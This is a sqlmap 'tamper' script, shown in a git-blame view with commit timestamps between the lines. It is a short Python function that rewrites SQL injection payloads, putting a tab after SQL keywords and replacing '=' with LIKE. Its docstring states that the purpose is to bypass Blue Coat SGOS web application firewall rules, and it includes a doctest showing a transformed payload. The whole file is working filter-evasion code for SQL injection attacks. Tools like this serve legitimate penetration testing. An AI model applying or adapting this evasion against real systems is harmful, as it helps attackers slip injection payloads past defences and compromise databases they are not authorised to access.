2013-02-14 15:32:17 +04:00
|
|
|
#!/usr/bin/env python
|
2012-11-03 22:15:22 +04:00
|
|
|
|
|
|
|
"""
|
2014-01-13 21:24:49 +04:00
|
|
|
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
2012-11-03 22:15:22 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
|
|
|
|
from lib.core.enums import PRIORITY
|
|
|
|
|
2012-11-05 16:09:53 +04:00
|
|
|
__priority__ = PRIORITY.NORMAL
|
2012-11-03 22:15:22 +04:00
|
|
|
|
|
|
|
def dependencies():
|
2012-11-29 18:53:54 +04:00
|
|
|
pass
|
2012-11-03 22:15:22 +04:00
|
|
|
|
2012-12-03 17:27:01 +04:00
|
|
|
def tamper(payload, **kwargs):
|
2012-11-05 16:09:53 +04:00
|
|
|
"""
|
|
|
|
Replaces space character after SQL statement with a valid random blank character.
|
|
|
|
Afterwards replace character = with LIKE operator
|
2012-11-03 22:15:22 +04:00
|
|
|
|
|
|
|
Requirement:
|
2012-11-29 18:53:54 +04:00
|
|
|
* Blue Coat SGOS with WAF activated as documented in
|
2012-11-03 22:15:22 +04:00
|
|
|
https://kb.bluecoat.com/index?page=content&id=FAQ2147
|
|
|
|
|
|
|
|
Tested against:
|
2012-11-05 16:09:53 +04:00
|
|
|
* MySQL 5.1, SGOS
|
2012-11-03 22:15:22 +04:00
|
|
|
|
|
|
|
Notes:
|
2012-11-05 16:09:53 +04:00
|
|
|
* Useful to bypass Blue Coat's recommended WAF rule configuration
|
2013-03-14 00:57:09 +04:00
|
|
|
|
|
|
|
>>> tamper('SELECT id FROM users where id = 1')
|
|
|
|
'SELECT%09id FROM users where id LIKE 1'
|
2012-11-05 16:09:53 +04:00
|
|
|
"""
|
2012-11-03 22:15:22 +04:00
|
|
|
|
2012-11-05 16:09:53 +04:00
|
|
|
retVal = payload
|
2012-11-03 22:15:22 +04:00
|
|
|
|
2012-11-05 16:09:53 +04:00
|
|
|
if payload:
|
2013-03-14 00:57:09 +04:00
|
|
|
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload)
|
2012-11-05 16:09:53 +04:00
|
|
|
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
|
2012-11-03 22:15:22 +04:00
|
|
|
|
2012-11-05 16:09:53 +04:00
|
|
|
return retVal
|